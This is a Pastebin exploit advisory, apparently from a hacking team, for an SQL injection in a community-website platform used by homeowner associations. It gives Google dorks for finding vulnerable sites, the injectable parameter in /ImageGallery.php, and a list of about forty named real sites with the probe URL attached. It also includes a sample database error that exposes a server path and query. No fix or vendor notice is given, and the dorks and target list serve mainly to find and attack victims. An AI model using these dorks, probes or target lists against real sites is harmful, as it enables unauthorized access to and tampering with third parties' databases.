Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###################################################################
- # Exploit Title : Taylor Morrison Evergreen-LM Vertilinc Neighborhood SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 26/03/2020
- # Vendor Homepage : taylormorrison.com - vertilinc.com - evergreen-lm.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:/std.php?lID=
- inurl:/ImageGallery.php?lCategoryID=
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ###################################################################
- # Impact :
- ***********
- Taylor Morrison Evergreen-LM Vertilinc Neighborhood is prone to an SQL-injection
- vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application, access or
- modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application and
- execute arbitrary SQL commands in application`s database. Further exploitation of this
- vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser or with any SQL Injector Tool.
- ###################################################################
- # SQL Vulnerable File :
- **********************
- /ImageGallery.php
- # SQL Vulnerable Parameter :
- ***************************
- ?lCategoryID=[ID-NUMBER]&lMenuID=
- # SQL Injection Exploit :
- **********************
- /ImageGallery.php?lCategoryID=[ID-NUMBER]&lMenuID=[SQL Injection]
- ###################################################################
- # Example Vulnerable Sites :
- *************************
- [+] marshallcreekcdd.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] eagleharboronline.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] solivitahoa.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] bellalagohoa.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] vitaliaattraditionhoa.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] artisanparkclub.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] highvistapoa.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] southernhillsonline.net/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] palenciaonline.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] delwebbnaplescommunity.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] myvictoriapark.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] watermill.us/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] flemingislandplantationowners.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] triplecreekhoa.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] eagleharboronline.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] egrandhampton.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] lakehousecovehoa.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] crestwicksouth.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] eagleharborassociation.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] seaplacecondominium.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] ravinesassoc.org/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] estanciaatwiregrasshoa.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] riverhallonline.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] cordobapoa.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] cameronforest.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] ameliawalkhoa.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] lighthousebay.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] artisanparkclub.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] somersetplantationhoa.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] bentonlakes.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] v2sitesetup.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] hawkinscove.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] lascalinasclub.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] longleafmasterhoa.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] oakleafhammockhoa.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] creeksideattwincreekshoa.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] ironwoodassociation.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] placidaharbourclub.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- [+] delwebbnaplescommunity.com/ImageGallery.php?lCategoryID=1207&lMenuID=1%27
- ###################################################################
- # Example SQL Database Error :
- ****************************
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL
- server version for the right syntax to use near '' at line 1 Warning: mysqli_fetch_assoc() expects
- parameter 1 to be mysqli_result, boolean given in D:\Website\MyCommunityV2\include
- \CommonFunctions.php on line 4426 ERROR: SELECT SUBbRequiresLogin FROM
- SubMenus WHERE SUBnNeighborhoodID = 125 AND SUBnTargetPageID =
- ###################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement